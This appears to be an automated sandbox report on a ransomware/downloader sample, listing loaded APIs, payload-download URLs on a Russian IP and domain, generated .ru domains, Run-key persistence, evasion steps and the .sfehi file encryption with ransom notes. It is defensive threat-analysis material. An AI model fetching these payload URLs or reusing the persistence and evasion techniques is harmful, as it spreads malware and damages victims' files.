DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 2293722122.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 2673932424.exe/atexit
HTTP traffic contains suspicious features which may be indicative of malware related traffic
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://92.63.197.48/m/1.exe
suspicious_request: http://92.63.197.48/m/2.exe
suspicious_request: http://92.63.197.48/m/3.exe
suspicious_request: http://92.63.197.48/m/4.exe
suspicious_request: http://92.63.197.48/m/5.exe
suspicious_request: http://92.63.197.48/1.exe
suspicious_request: http://92.63.197.48/2.exe
suspicious_request: http://92.63.197.48/3.exe
suspicious_request: http://92.63.197.48/4.exe
suspicious_request: http://92.63.197.48/5.exe
Performs some HTTP requests
url: http://slpsrgpsrhojifdij.ru/1.exe
url: http://slpsrgpsrhojifdij.ru/2.exe
url: http://slpsrgpsrhojifdij.ru/3.exe
url: http://slpsrgpsrhojifdij.ru/4.exe
url: http://slpsrgpsrhojifdij.ru/5.exe
url: http://92.63.197.48/m/1.exe
url: http://92.63.197.48/m/2.exe
url: http://92.63.197.48/m/3.exe
url: http://92.63.197.48/m/4.exe
url: http://92.63.197.48/m/5.exe
url: http://92.63.197.48/1.exe
url: http://92.63.197.48/2.exe
url: http://92.63.197.48/3.exe
url: http://92.63.197.48/4.exe
url: http://92.63.197.48/5.exe
The binary likely contains encrypted or compressed data.
section: name: .text, entropy: 6.83, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x00019c00, virtual_size: 0x00019a10
Attempts to remove evidence of file being downloaded from the Internet
file: C:\Users\user\AppData\Local\Temp\4X6zg5pg.exe:Zone.Identifier
Attempts to repeatedly call a single API many times in order to delay analysis time
Spam: 1717238076.exe (1352) called API NtClose 500152 times
Spam: 1865041414.exe (2884) called API NtClose 500152 times
Installs itself for autorun at Windows startup
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
data: C:\Windows\806084767800850\winsvcs.exe
key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
data: C:\Windows\806084767800850\winsvcs.exe
Exhibits possible ransomware file modification behavior
mass file_deletion: Appears to have deleted 202 files indicative of ransomware or wiper malware deleting files to prevent recovery
file_modifications: Performs 200 file moves indicative of a potential file encryption process
drops_unknown_mimetypes: Drops 277 unknown file mime types which may be indicative of encrypted files being written back to disk
appends_new_extension: Appends a new file extension to multiple modified files
new_appended_file_extension: .sfehi
Creates a hidden or system file
file: C:\Windows\5769805074060605
file: C:\Windows\5769805074060605\winsvcs.exe
file: C:\Windows\806084767800850
file: C:\Windows\806084767800850\winsvcs.exe
file: C:\a4889873a4889f9232.lock
file: C:\$Recycle.Bin\a4889873a4889f9232.lock
file: C:\$Recycle.Bin\S-1-5-21-120665959-548228820-2376508522-1001\a4889873a4889f9232.lock
file: C:\Documents and Settings\a4889873a4889f9232.lock
file: C:\Drivers\a4889873a4889f9232.lock
file: C:\Hotfix\a4889873a4889f9232.lock
file: C:\Hotfix\LocalPack\a4889873a4889f9232.lock
file: C:\Hotfix\LocalPack\x64\a4889873a4889f9232.lock
file: C:\Hotfix\LocalPack\x86\a4889873a4889f9232.lock
file: C:\Hotfix\Update\a4889873a4889f9232.lock
file: C:\Hotfix\Update\x64\a4889873a4889f9232.lock
file: C:\Hotfix\Update\x86\a4889873a4889f9232.lock
file: C:\MSOCache\a4889873a4889f9232.lock
file: C:\PerfLogs\a4889873a4889f9232.lock
file: C:\PerfLogs\Admin\a4889873a4889f9232.lock
file: C:\Program Files\a4889873a4889f9232.lock
file: C:\Program Files (x86)\a4889873a4889f9232.lock
file: C:\Python27\a4889873a4889f9232.lock
file: C:\Python27\DLLs\a4889873a4889f9232.lock
file: C:\Python27\Doc\a4889873a4889f9232.lock
file: C:\Python27\include\a4889873a4889f9232.lock
file: C:\Python27\Lib\a4889873a4889f9232.lock
file: C:\Python27\Lib\bsddb\a4889873a4889f9232.lock
file: C:\Python27\Lib\bsddb\test\a4889873a4889f9232.lock
file: C:\Python27\Lib\compiler\a4889873a4889f9232.lock
file: C:\Python27\Lib\ctypes\a4889873a4889f9232.lock
file: C:\Python27\Lib\ctypes\macholib\a4889873a4889f9232.lock
Checks the CPU name from registry, possibly for anti-virtualization
Operates on local firewall's policies and settings
Creates a copy of itself
copy: C:\Windows\5769805074060605\winsvcs.exe
Attempts to disable System Restore
Drops a binary and executes it
binary: C:\Users\user\AppData\Local\Temp\2293722122.exe
binary: C:\Users\user\AppData\Local\Temp\1717238076.exe
binary: C:\Users\user\AppData\Local\Temp\3065331339.exe
binary: C:\Users\user\AppData\Local\Temp\2673932424.exe
binary: C:\Users\user\AppData\Local\Temp\1398632723.exe
binary: C:\Users\user\AppData\Local\Temp\1257032286.exe
binary: C:\Users\user\AppData\Local\Temp\3750816931.exe
binary: C:\Users\user\AppData\Local\Temp\1865041414.exe
binary: C:\Users\user\AppData\Local\Temp\1227434603.exe
binary: C:\Users\user\AppData\Local\Temp\1495120250.exe
binary: C:\Users\user\AppData\Local\Temp\2459023548.exe
binary: C:\Users\user\AppData\Local\Temp\4032832645.exe
binary: C:\Users\user\AppData\Local\Temp\3876917383.exe
binary: C:\Windows\5769805074060605\winsvcs.exe
binary: C:\Windows\806084767800850\winsvcs.exe
binary: C:\Users\user\AppData\Local\Temp\1674315261.exe
binary: C:\Users\user\AppData\Local\Temp\2080821079.exe
binary: C:\Users\user\AppData\Local\Temp\2810629864.exe
binary: C:\Users\user\AppData\Local\Temp\2841536727.exe
binary: C:\Users\user\AppData\Local\Temp\1674519319.exe
binary: C:\Users\user\AppData\Local\Temp\3304035876.exe
binary: C:\Users\user\AppData\Local\Temp\3751939260.exe
binary: C:\Users\user\AppData\Local\Temp\2400240831.exe
binary: C:\Users\user\AppData\Local\Temp\2686919881.exe
Attempts to modify or disable Security Center warnings

Screenshots


Hosts

Direct IP Country Name
N 92.63.197.48 [VT] Russian Federation
Y 8.8.8.8 [VT] United States

DNS

Name Response Post-Analysis Lookup
slpsrgpsrhojifdij.ru [VT] A 92.63.197.48 [VT]
osheoufhusheoghuesd.ru [VT] NXDOMAIN [VT]
ofheofosugusghuhush.ru [VT]
suieiusiueiuiuushgf.ru [VT]
fuiueufiiehfueghuhf.ru [VT]
sisoefjsuhuhaudhhed.ru [VT]
opllforgirsoofuhohu.ru [VT]
eooeoeooejesfiehfii.ru [VT]
oefosfishiudhiusegf.ru [VT]
aaeiauebfaneifuaeif.ru [VT]
naibfiahdiauehihhre.ru [VT]
auaeuiihaehifhahaud.ru [VT]
oieoaidhhaidhiehheg.ru [VT]
fisiuuiedesubdibesd.ru [VT]
efiiuehdiahiuediaug.ru [VT]
sfiushidhseiugiuseh.ru [VT]
oeiieieisijdingisgf.ru [VT]
aiisiaueuefiuhiehgu.ru [VT]
sfsiuhieghaughaoeho.ru [VT]
hpptlhptdkoodsokdke.ru [VT]
eneebgieeiieieiddrt.ru [VT]
eniaebivaiebifaibef.ru [VT]
mmginsiridnsinnsgir.ru [VT]
gmndaudnahgahghaohh.ru [VT]
aefaidihabevbabifba.ru [VT]
rgijirshisjriijdijh.ru [VT]
aiehazegfageigfzgei.ru [VT]
foaeodheuabguaegubr.ru [VT]
guhaohadueoanavbvbf.ru [VT]
orsodaououaebufbeob.ru [VT]
eaiiakeiohoueghoaur.ru [VT]
naiebiaifzgfaezgdzr.ru [VT]
gaeuhdobaoebuagoaoe.ru [VT]
giuahfoaoeubfouaena.ru [VT]
rgsouhdoauenodaeufb.ru [VT]
eoguaonedonaodabobg.ru [VT]
gouaondoaudbaebobgu.ru [VT]
giohuoaehdoueofbaur.ru [VT]
gnaoedoaoounauubueu.ru [VT]
gbobaebaodebuoueofu.ru [VT]
srgouosehohedohaeoh.ru [VT]

Summary

C:\Users\user\AppData\Local\Temp\msvcr100.dll
C:\Windows\System32\msvcr100.dll
C:\Windows\system\msvcr100.dll
C:\Windows\msvcr100.dll
C:\Windows\System32\wbem\msvcr100.dll
C:\Windows\System32\WindowsPowerShell\v1.0\msvcr100.dll
C:\Users\user\AppData\Local\Temp\4X6zg5pg.exe:Zone.Identifier
C:\Windows\5769805074060605\winsvcs.exe
C:\Windows\5769805074060605
C:\Users\user\AppData\Local\Temp\4X6zg5pg.exe
C:\Windows\5769805074060605\msvcr100.dll
C:\Windows\5769805074060605\winsvcs.exe:Zone.Identifier
\Device\KsecDD
C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\System32\ras\*.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk
C:\Users\user\AppData\Local\Temp\1865041414.exe
C:\Users\user\AppData\Local\Temp\2841536727.exe
C:\Users\user\AppData\Local\Temp\2841536727.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3751939260.exe
C:\Users\user\AppData\Local\Temp\3751939260.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1865041414.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2080821079.exe
C:\Users\user\AppData\Local\Temp\2080821079.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1257032286.exe
C:\Users\user\AppData\Local\Temp\1257032286.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1674519319.exe
C:\Users\user\AppData\Local\Temp\1674519319.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3065331339.exe
C:\Users\user\AppData\Local\Temp\3065331339.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3876917383.exe
C:\Users\user\AppData\Local\Temp\3876917383.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2810629864.exe
C:\Users\user\AppData\Local\Temp\2810629864.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3750816931.exe
C:\Users\user\AppData\Local\Temp\3750816931.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1398632723.exe
C:\Users\user\AppData\Local\Temp\1398632723.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\4032832645.exe
C:\Users\user\AppData\Local\Temp\4032832645.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1674315261.exe
C:\Users\user\AppData\Local\Temp\1674315261.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2459023548.exe
C:\Users\user\AppData\Local\Temp\2459023548.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3304035876.exe
C:\Users\user\AppData\Local\Temp\3304035876.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2400240831.exe
C:\Users\user\AppData\Local\Temp\2400240831.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2686919881.exe
C:\Users\user\AppData\Local\Temp\2686919881.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2293722122.exe
C:\Users\user\AppData\Local\Temp\2293722122.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1227434603.exe
C:\Users\user\AppData\Local\Temp\1227434603.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2673932424.exe
C:\Users\user\AppData\Local\Temp\2673932424.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2414711781.exe
C:\Windows\SysWOW64\en-US\KERNELBASE.dll.mui
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\806084767800850\winsvcs.exe
C:\Windows\806084767800850
C:\Windows\806084767800850\msvcr100.dll
C:\Windows\806084767800850\winsvcs.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1495120250.exe
C:\Users\user\AppData\Local\Temp\1495120250.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1717238076.exe
C:\Users\user\AppData\Local\Temp\1717238076.exe:Zone.Identifier
C:\
A:
B:
E:
F:
G:
H:
I:
J:
K:
L:
M:
N:
O:
P:
Q:
R:
S:
T:
U:
V:
W:
X:
Y:
Z:
\x01:
C:\SFEHI-DECRYPT.txt
\Device\RdpDr
\??\PIPE\wkssvc
C:\DosDevices\pipe\
C:\a4889873a4889f9232.lock
C:\*
C:\$Recycle.Bin\SFEHI-DECRYPT.txt
\Device\LanmanDatagramReceiver
C:\$Recycle.Bin\a4889873a4889f9232.lock
C:\$Recycle.Bin\*
C:\$Recycle.Bin\S-1-5-21-120665959-548228820-2376508522-1001\SFEHI-DECRYPT.txt
C:\$Recycle.Bin\S-1-5-21-120665959-548228820-2376508522-1001\a4889873a4889f9232.lock
C:\$Recycle.Bin\S-1-5-21-120665959-548228820-2376508522-1001\*
C:\agent.pyw
C:\agent.pyw.sfehi
C:\Documents and Settings\SFEHI-DECRYPT.txt
C:\Documents and Settings\a4889873a4889f9232.lock
C:\Documents and Settings\*
C:\Drivers\SFEHI-DECRYPT.txt
C:\Drivers\a4889873a4889f9232.lock
C:\Drivers\*
C:\Drivers\nusb3hub.cat
C:\Drivers\nusb3hub.inf
C:\Drivers\nusb3xhc.cat
C:\Drivers\nusb3xhc.inf
C:\Hotfix\SFEHI-DECRYPT.txt
C:\Hotfix\a4889873a4889f9232.lock
C:\Hotfix\*
C:\Hotfix\LocalPack\SFEHI-DECRYPT.txt
C:\Hotfix\LocalPack\a4889873a4889f9232.lock
C:\Hotfix\LocalPack\*
C:\Hotfix\LocalPack\x64\SFEHI-DECRYPT.txt
C:\Hotfix\LocalPack\x64\a4889873a4889f9232.lock
C:\Hotfix\LocalPack\x64\*
C:\Hotfix\LocalPack\x86\SFEHI-DECRYPT.txt
C:\Hotfix\LocalPack\x86\a4889873a4889f9232.lock
C:\Hotfix\LocalPack\x86\*
C:\Hotfix\Update\SFEHI-DECRYPT.txt
C:\Hotfix\Update\a4889873a4889f9232.lock
C:\Hotfix\Update\*
C:\Hotfix\Update\x64\SFEHI-DECRYPT.txt
C:\Hotfix\Update\x64\a4889873a4889f9232.lock
C:\Hotfix\Update\x64\*
C:\Hotfix\Update\x86\SFEHI-DECRYPT.txt
C:\Hotfix\Update\x86\a4889873a4889f9232.lock
C:\Hotfix\Update\x86\*
C:\MSOCache\SFEHI-DECRYPT.txt
C:\MSOCache\a4889873a4889f9232.lock
C:\MSOCache\*
C:\PerfLogs\SFEHI-DECRYPT.txt
C:\PerfLogs\a4889873a4889f9232.lock
C:\PerfLogs\*
C:\PerfLogs\Admin\SFEHI-DECRYPT.txt
C:\PerfLogs\Admin\a4889873a4889f9232.lock
C:\PerfLogs\Admin\*
C:\Program Files\SFEHI-DECRYPT.txt
C:\Program Files\a4889873a4889f9232.lock
C:\Program Files\*
C:\Program Files (x86)\SFEHI-DECRYPT.txt
C:\Program Files (x86)\a4889873a4889f9232.lock
C:\Program Files (x86)\*
C:\Python27\SFEHI-DECRYPT.txt
C:\Python27\a4889873a4889f9232.lock
C:\Python27\*
C:\Python27\DLLs\SFEHI-DECRYPT.txt
C:\Python27\DLLs\a4889873a4889f9232.lock
C:\Python27\DLLs\*
C:\Python27\DLLs\bz2.pyd
C:\Python27\DLLs\bz2.pyd.sfehi
C:\Python27\DLLs\pyexpat.pyd
C:\Python27\DLLs\select.pyd
C:\Python27\DLLs\unicodedata.pyd
C:\Python27\DLLs\unicodedata.pyd.sfehi
C:\Python27\DLLs\winsound.pyd
C:\Python27\DLLs\winsound.pyd.sfehi
C:\Python27\DLLs\_bsddb.pyd
C:\Python27\DLLs\_bsddb.pyd.sfehi
C:\Python27\DLLs\_ctypes.pyd
C:\Python27\DLLs\_ctypes_test.pyd
\??\PIPE\DAV RPC SERVICE
C:\Python27\DLLs\_ctypes_test.pyd.sfehi
C:\Python27\DLLs\_elementtree.pyd
C:\Python27\DLLs\_elementtree.pyd.sfehi
C:\Python27\DLLs\_hashlib.pyd
C:\Python27\DLLs\_msi.pyd
C:\Python27\DLLs\_msi.pyd.sfehi
C:\Python27\DLLs\_multiprocessing.pyd
C:\Python27\DLLs\_multiprocessing.pyd.sfehi
C:\Python27\DLLs\_socket.pyd
C:\Python27\DLLs\_sqlite3.pyd
C:\Python27\DLLs\_sqlite3.pyd.sfehi
C:\Python27\DLLs\_ssl.pyd
C:\Python27\DLLs\_testcapi.pyd
C:\Python27\DLLs\_testcapi.pyd.sfehi
C:\Python27\DLLs\_tkinter.pyd
C:\Python27\Doc\SFEHI-DECRYPT.txt
C:\Python27\Doc\a4889873a4889f9232.lock
C:\Python27\Doc\*
C:\Python27\Doc\python276.chm
C:\Python27\Doc\python276.chm.sfehi
C:\Python27\include\SFEHI-DECRYPT.txt
C:\Python27\include\a4889873a4889f9232.lock
C:\Python27\include\*
C:\Python27\include\abstract.h
C:\Python27\include\abstract.h.sfehi
C:\Python27\include\asdl.h
C:\Python27\include\asdl.h.sfehi
C:\Python27\include\ast.h
C:\Python27\include\ast.h.sfehi
C:\Python27\include\bitset.h
C:\Python27\include\bitset.h.sfehi
C:\Python27\include\boolobject.h
C:\Python27\include\boolobject.h.sfehi
C:\Python27\include\bufferobject.h
C:\Python27\include\bufferobject.h.sfehi
C:\Python27\include\bytearrayobject.h
C:\Python27\include\bytearrayobject.h.sfehi
C:\Python27\include\bytesobject.h
C:\Python27\include\bytesobject.h.sfehi
C:\Python27\include\bytes_methods.h
C:\Python27\include\bytes_methods.h.sfehi
C:\Python27\include\cellobject.h
C:\Python27\include\cellobject.h.sfehi
C:\Python27\include\ceval.h
C:\Python27\include\ceval.h.sfehi
C:\Python27\include\classobject.h
C:\Python27\include\classobject.h.sfehi
C:\Python27\include\cobject.h
C:\Python27\include\cobject.h.sfehi
C:\Python27\include\code.h
C:\Python27\include\code.h.sfehi
C:\Python27\include\codecs.h
C:\Python27\include\codecs.h.sfehi
C:\Python27\include\compile.h
C:\Python27\include\compile.h.sfehi
C:\Python27\include\complexobject.h
C:\Python27\include\complexobject.h.sfehi
C:\Python27\include\cStringIO.h
C:\Python27\include\cStringIO.h.sfehi
C:\Python27\include\datetime.h
C:\Python27\include\datetime.h.sfehi
C:\Python27\include\descrobject.h
C:\Python27\include\descrobject.h.sfehi
C:\Python27\include\dictobject.h
C:\Python27\include\dictobject.h.sfehi
C:\Python27\include\dtoa.h
C:\Python27\include\dtoa.h.sfehi
C:\Python27\include\enumobject.h
C:\Python27\include\enumobject.h.sfehi
C:\Python27\include\errcode.h
C:\Python27\include\errcode.h.sfehi
C:\Python27\include\eval.h
C:\Python27\include\eval.h.sfehi
C:\Python27\include\fileobject.h
C:\Python27\include\fileobject.h.sfehi
C:\Python27\include\floatobject.h
C:\Python27\include\floatobject.h.sfehi
C:\Python27\include\frameobject.h
C:\Python27\include\frameobject.h.sfehi
C:\Python27\include\funcobject.h
C:\Python27\include\funcobject.h.sfehi
C:\Python27\include\genobject.h
C:\Python27\include\genobject.h.sfehi
C:\Python27\include\graminit.h
C:\Python27\include\graminit.h.sfehi
C:\Python27\include\grammar.h
C:\Python27\include\grammar.h.sfehi
C:\Python27\include\import.h
C:\Python27\include\import.h.sfehi
C:\Python27\include\intobject.h
C:\Python27\include\intobject.h.sfehi
C:\Python27\include\intrcheck.h
C:\Python27\include\intrcheck.h.sfehi
C:\Python27\include\iterobject.h
C:\Python27\include\iterobject.h.sfehi
C:\Python27\include\listobject.h
C:\Python27\include\listobject.h.sfehi
C:\Python27\include\longintrepr.h
C:\Python27\include\longintrepr.h.sfehi
C:\Python27\include\longobject.h
C:\Python27\include\longobject.h.sfehi
C:\Python27\include\marshal.h
C:\Python27\include\marshal.h.sfehi
C:\Python27\include\memoryobject.h
C:\Python27\include\memoryobject.h.sfehi
C:\Python27\include\metagrammar.h
C:\Python27\include\metagrammar.h.sfehi
C:\Python27\include\methodobject.h
C:\Python27\include\methodobject.h.sfehi
C:\Python27\include\modsupport.h
C:\Python27\include\modsupport.h.sfehi
C:\Python27\include\moduleobject.h
C:\Python27\include\moduleobject.h.sfehi
C:\Python27\include\node.h
C:\Python27\include\node.h.sfehi
C:\Python27\include\object.h
C:\Python27\include\object.h.sfehi
C:\Python27\include\objimpl.h
C:\Python27\include\objimpl.h.sfehi
C:\Python27\include\opcode.h
C:\Python27\include\opcode.h.sfehi
C:\Python27\include\osdefs.h
C:\Python27\include\osdefs.h.sfehi
C:\Python27\include\parsetok.h
C:\Python27\include\parsetok.h.sfehi
C:\Python27\include\patchlevel.h
C:\Python27\include\patchlevel.h.sfehi
C:\Python27\include\pgen.h
C:\Python27\include\pgen.h.sfehi
C:\Python27\include\pgenheaders.h
C:\Python27\include\pgenheaders.h.sfehi
C:\Python27\include\pyarena.h
C:\Python27\include\pyarena.h.sfehi
C:\Python27\include\pycapsule.h
C:\Python27\include\pycapsule.h.sfehi
C:\Python27\include\pyconfig.h
C:\Python27\include\pyconfig.h.sfehi
C:\Python27\include\pyctype.h
C:\Python27\include\pyctype.h.sfehi
C:\Python27\include\pydebug.h
C:\Python27\include\pydebug.h.sfehi
C:\Python27\include\pyerrors.h
C:\Python27\include\pyerrors.h.sfehi
C:\Python27\include\pyexpat.h
C:\Python27\include\pyexpat.h.sfehi
C:\Python27\include\pyfpe.h
C:\Python27\include\pyfpe.h.sfehi
C:\Python27\include\pygetopt.h
C:\Python27\include\pygetopt.h.sfehi
C:\Python27\include\pymacconfig.h
C:\Python27\include\pymacconfig.h.sfehi
C:\Python27\include\pymactoolbox.h
C:\Python27\include\pymactoolbox.h.sfehi
C:\Python27\include\pymath.h
C:\Python27\include\pymath.h.sfehi
C:\Python27\include\pymem.h
C:\Python27\include\pymem.h.sfehi
C:\Python27\include\pyport.h
C:\Python27\include\pyport.h.sfehi
C:\Python27\include\pystate.h
C:\Python27\include\pystate.h.sfehi
C:\Python27\include\pystrcmp.h
C:\Python27\include\pystrcmp.h.sfehi
C:\Python27\include\pystrtod.h
C:\Python27\include\pystrtod.h.sfehi
C:\Python27\include\Python-ast.h
C:\Python27\include\Python-ast.h.sfehi
C:\Python27\include\Python.h
C:\Python27\include\Python.h.sfehi
C:\Python27\include\pythonrun.h
C:\Python27\include\pythonrun.h.sfehi
C:\Python27\include\pythread.h
C:\Python27\include\pythread.h.sfehi
C:\Python27\include\py_curses.h
C:\Python27\include\py_curses.h.sfehi
C:\Python27\include\rangeobject.h
C:\Python27\include\rangeobject.h.sfehi
C:\Python27\include\setobject.h
C:\Python27\include\setobject.h.sfehi
C:\Python27\include\sliceobject.h
C:\Python27\include\sliceobject.h.sfehi
C:\Python27\include\stringobject.h
C:\Python27\include\stringobject.h.sfehi
C:\Python27\include\structmember.h
C:\Python27\include\structmember.h.sfehi
C:\Python27\include\structseq.h
C:\Python27\include\structseq.h.sfehi
